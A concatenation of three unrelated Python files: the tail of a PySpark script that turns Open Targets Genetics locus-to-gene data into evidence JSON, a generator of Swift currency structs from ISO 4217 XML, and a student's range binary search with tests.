format='%(asctime)s %(levelname)s %(module)s - %(funcName)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
)
    if args.logFile:
        # In addition to stderr (configured by basicConfig above), also write
        # the logs to the requested file
        logging.getLogger().addHandler(logging.FileHandler(args.logFile))
# Parse output file:
out_file = args.outputFile
# Initialize spark session
global spark
spark = (pyspark.sql.SparkSession.builder.getOrCreate())
logging.info(f'Spark version: {spark.version}')
# Log parameters:
logging.info(f'Locus2gene table: {in_l2g}')
logging.info(f'Top locus table: {in_toploci}')
logging.info(f'Study table: {in_study}')
logging.info(f'Variant index table: {in_varindex}')
logging.info(f'ECO code table: {in_csq_eco}')
logging.info(f'Output file: {out_file}')
logging.info(f'l2g score threshold: {l2g_threshold}')
logging.info('Generating evidence:')
# Load locus-to-gene (L2G) score data
l2g = (
spark.read.parquet(in_l2g)
# Keep results trained on high or medium confidence gold-standards
.filter(col('training_gs') == 'high_medium')
# Keep results from xgboost model
.filter(col('training_clf') == 'xgboost')
        # keeping rows with l2g score above the threshold:
.filter(col('y_proba_full_model') >= l2g_threshold)
# Only keep study, variant, gene and score info
.select(
'study_id',
'chrom', 'pos', 'ref', 'alt',
'gene_id',
'y_proba_full_model',
)
)
# Load association statistics (only pvalue is required) from top loci table
pvals = (
spark.read.parquet(in_toploci)
# # Calculate pvalue from the mantissa and exponent
# .withColumn('pval', col('pval_mantissa') * pow(10, col('pval_exponent')))
        # # NB. be careful as very small floats will be set to 0, we can set these
# # to the smallest possible float instead
# .withColumn('pval',
# when(col('pval') == 0, sys.float_info.min)
# .otherwise(col('pval'))
# )
# Keep required fields
.select(
'study_id', 'chrom', 'pos', 'ref', 'alt', 'beta', 'beta_ci_lower', 'beta_ci_upper',
'pval_mantissa', 'pval_exponent', 'odds_ratio', 'oddsr_ci_lower', 'oddsr_ci_upper'
)
)
# Load (a) disease information, (b) sample size from the study table
study_info = (
spark.read.parquet(in_study)
.select(
'study_id', 'pmid', 'pub_date', 'pub_author', 'trait_reported',
'trait_efos',
col('n_initial').alias('sample_size') # Rename to sample size
)
# Warning! Not all studies have an EFO annotated. Also, some have
# multiple EFOs! We need to decide a strategy to deal with these.
# # For example, only keep studies with 1 efo:
# .filter(size(col('trait_efos')) == 1)
# .withColumn('efo', col('trait_efos').getItem(0))
# .drop('trait_efos')
# Or, drop rows with no EFO and then explode array to multiple rows
.withColumn(
'trait_efos',
when(
col('trait_efos').isNotNull(),
expr('filter(trait_efos, t -> length(t) > 0)')
)
)
.withColumn('efo', explode(col('trait_efos')))
.drop('trait_efos')
)
# Get mapping for rsIDs:
rsID_map = (
spark.read.parquet(in_varindex)
        # Keep GRCh38 coordinates (chrom_b38|pos_b38), alleles and rsID
.selectExpr(
'chrom_b38 as chrom', 'pos_b38 as pos', 'ref', 'alt', 'rsid'
)
)
# Load consequences:
var_consequences = (
spark.read.parquet(in_varindex)
# chrom_b38|pos_b38
# Explode consequences, only keeping canonical transcript
.selectExpr(
'chrom_b38 as chrom', 'pos_b38 as pos', 'ref', 'alt',
'vep.most_severe_consequence as most_severe_csq',
'''explode(
filter(vep.transcript_consequences, x -> x.canonical == 1)
) as tc
'''
)
# Keep required fields from consequences struct
.selectExpr(
'chrom', 'pos', 'ref', 'alt', 'most_severe_csq',
'tc.gene_id as gene_id',
'tc.consequence_terms as csq_arr',
)
)
# Get most severe consequences:
# Load term to eco score dict
# (eco_dict,eco_link_dict) = spark.sparkContext.broadcast(load_eco_dict(in_csq_eco))
eco_dicts = spark.sparkContext.broadcast(load_eco_dict(in_csq_eco))
get_link = udf(
lambda x: eco_dicts.value[1][x],
StringType()
)
    # Extract the most severe csq per gene.
# Create UDF that reverse sorts csq terms using eco score dict, then select
# the first item. Then apply UDF to all rows in the data.
get_most_severe = udf(
lambda arr: sorted(arr, key=lambda x: eco_dicts.value[0].get(x, 0), reverse=True)[0],
StringType()
)
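    # Worked example (with illustrative scores): for csq_arr =
    # ['intron_variant', 'missense_variant'] and eco scores
    # {'intron_variant': 0.1, 'missense_variant': 0.7}, the UDF above
    # returns 'missense_variant'.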
var_consequences = (
var_consequences.withColumn('most_severe_gene_csq', get_most_severe(col('csq_arr')))
.withColumn('consequence_link', get_link(col('most_severe_gene_csq')))
)
# Join datasets together
processed = (
l2g
# Join L2G to pvals, using study and variant info as key
.join(pvals, on=['study_id', 'chrom', 'pos', 'ref', 'alt'])
# Join this to the study info, using study_id as key
.join(study_info, on='study_id', how='left')
# Join transcript consequences:
.join(var_consequences, on=['chrom', 'pos', 'ref', 'alt', 'gene_id'], how='left')
# Join rsIDs:
.join(rsID_map, on=['chrom', 'pos', 'ref', 'alt'], how='left')
# Filling with missing values:
.fillna(
{
'most_severe_gene_csq': 'intergenic_variant',
'consequence_link': 'http://purl.obolibrary.org/obo/SO_0001628'
}
)
)
# Write output
(
processed
.withColumn(
'literature',
when(col('pmid') != '', array(regexp_extract(col('pmid'), r"PMID:(\d+)$", 1))).otherwise(None)
)
.select(
lit('ot_genetics_portal').alias('datasourceId'),
lit('genetic_association').alias('datatypeId'),
col('gene_id').alias('targetFromSourceId'),
col('efo').alias('diseaseFromSourceMappedId'),
col('literature'),
col('pub_author').alias('publicationFirstAuthor'),
substring(col('pub_date'), 1, 4).cast(IntegerType()).alias('publicationYear'),
col('trait_reported').alias('diseaseFromSource'),
col('study_id').alias('studyId'),
col('sample_size').alias('studySampleSize'),
col('pval_mantissa').alias('pValueMantissa'),
col('pval_exponent').alias('pValueExponent'),
col('odds_ratio').alias('oddsRatio'),
col('oddsr_ci_lower').alias('oddsRatioConfidenceIntervalLower'),
col('oddsr_ci_upper').alias('oddsRatioConfidenceIntervalUpper'),
col('beta').alias('beta'),
col('beta_ci_lower').alias('betaConfidenceIntervalLower'),
col('beta_ci_upper').alias('betaConfidenceIntervalUpper'),
col('y_proba_full_model').alias('resourceScore'),
col('rsid').alias('variantRsId'),
concat_ws('_', col('chrom'), col('pos'), col('ref'), col('alt')).alias('variantId'),
regexp_extract(col('consequence_link'), r"\/(SO.+)$", 1).alias('variantFunctionalConsequenceId')
)
.dropDuplicates(['variantId', 'studyId', 'targetFromSourceId', 'diseaseFromSourceMappedId'])
.write.format('json').mode('overwrite').option('compression', 'gzip').save(out_file)
)
return 0
if __name__ == '__main__':
main()
|
from xml.dom.minidom import parse
import json
struct_format = '''
public struct {0}: Currency {{
public static var code = "{0}"
public static var name = "{1}"
public static var numericCode = "{2}"
public static var minorUnits: Int? = {3}
public static var entities: [String] = [{4}]
public var value: Decimal
public init(_ value: Decimal) {{
self.value = value
}}
}}
'''
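# For illustration, an ISO 4217 entry such as USD ("US Dollar", numeric code
# 840, 2 minor units) is rendered by the template above roughly as:
#
#   public struct USD: Currency {
#       public static var code = "USD"
#       public static var name = "US Dollar"
#       public static var numericCode = "840"
#       public static var minorUnits: Int? = 2
#       public static var entities: [String] = ["UNITED STATES OF AMERICA (THE)", ...]
#       ...
#   }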
def parse_xml(filename):
dom = parse(filename)
filename = f'{dom.firstChild.nodeName}_{dom.firstChild.getAttribute("Pblshd")}'
result = dict()
elements = dom.getElementsByTagName('CcyNtry')
for entry in elements:
if not entry.getElementsByTagName("Ccy"):
continue
entity = entry.getElementsByTagName("CtryNm")[0].firstChild.data
name = entry.getElementsByTagName("CcyNm")[0].firstChild.data
code = entry.getElementsByTagName("Ccy")[0].firstChild.data
numeric = entry.getElementsByTagName("CcyNbr")[0].firstChild.data
units = entry.getElementsByTagName("CcyMnrUnts")[0].firstChild.data
try:
units = int(units)
        except (TypeError, ValueError):
units = None
if code in result:
result[code]['entities'].append(entity)
else:
result[code] = {
'code': code,
'name': name,
'numericCode': numeric,
'minorUnits': units,
'entities': [entity]
}
return result
def write_json(currencies, filename):
    with open(f'{filename}.json', 'w') as f:
        f.write(json.dumps(currencies))
def main():
result = parse_xml('list_one.xml')
array = list()
for code in sorted(result.keys()):
array.append(result[code])
write_swift(array)
def write_swift(currencies):
    with open('Currencies.swift', 'w') as f:
f.write('import Foundation\nimport Money\n')
for currency in currencies:
units = currency['minorUnits'] or 'nil'
entities = [e.replace('"', '\\"') for e in currency['entities']]
entities = ', '.join([f'"{e}"' for e in entities])
struct = struct_format.format(currency['code'], currency['name'], currency['numericCode'], units, entities)
f.write(struct)
if __name__ == '__main__':
main()
|
"""
210CT - Programming, Algorithms and Data Structures.
Question9.py
Purpose: A function to search a value between a given interval
in sequence using binary search algorithm.
Author : Rithin Chalumuri
Version: 1.0
Date : 02/12/16
"""
def rangeBinarySearch( sequence, a, b ):
"""
Function to search a value between a given interval in sequence using binary search algorithm.
Parameters:
sequence(list); the sequence of different values
        a(int or float); the lower limit of the interval
        b(int or float); the upper limit of the interval
    Returns:
        A boolean value; True if a value is found within the given interval, otherwise False.
        If inputs of an unsupported type are provided, an error message is
        printed and False is returned (the internal TypeError is caught).
"""
try:
typeSeq = isinstance(sequence,list)
typeA = isinstance(a,int) or isinstance(a,float)
typeB = isinstance(b,int) or isinstance(b,float)
if not(typeSeq) or not(typeA) or not(typeB): #If wrong types of input are provided
raise TypeError
        if b < a: #When the user provides an upper limit value less than the lower limit value
            (a,b) = (b,a)
            print("The upper limit value is less than the lower limit value.")
            print("In order to proceed, this function has swapped the values of the upper and lower limits.")
#Binary Search Algorithm
start = 0
end = len(sequence)-1
while start <= end:
mid = (start+end)//2 #pivot
if a <= sequence[mid] <= b : #if the middle value of sequence is in the range
return True
            elif b < sequence[mid]: #if upper limit is less than middle value
end = mid -1
else: # if upper limit is greater than middle value
start = mid +1
return False
except TypeError: #If user provides unsupported types of input
print("Error: Please provide the sequence of type 'list'")
print(" and limits of type 'int' and try again.")
return False
# Testing rangeBinarySearch Function
if __name__ == "__main__":
sequence = [-2.5,-2,-1,0,1,1.32,2,3,5,6,7,16.5,19,29,39,40,43,46,49]
print("Sequence: "+str(sequence))
test1 = (20,40)
test2 = (1,1)
test3 = (1,3)
test4 = (0,1)
test5 = (1,-5)
test6 = (100,200)
test7 = ("a","b")
test8 = (16.4,16.6)
tests = [test1, test2, test3, test4, test5, test6,test7,test8]
testresults = [True,True,True,True,True,False,False,True]
count = 0
passed = 0
failed = 0
for test in tests:
print("Performing Test " + str(count+1) + ";")
print("lower range = "+str(test[0]) + ", upper range = "+ str(test[1]))
result = rangeBinarySearch(sequence, test[0], test[1])
if result == testresults[count]:
print("Function Output = " + str(result))
print("Test Passed.")
passed += 1
else:
print("Function Output = " + str(result))
print("Expected Output = " + str(testresults[count]))
print("Test Failed.")
failed += 1
count = count + 1
print("-"*60)
print("Total tests performed: "+str(count))
print("Tests passed: "+str(passed))
print("Tests failed: "+str(failed))
|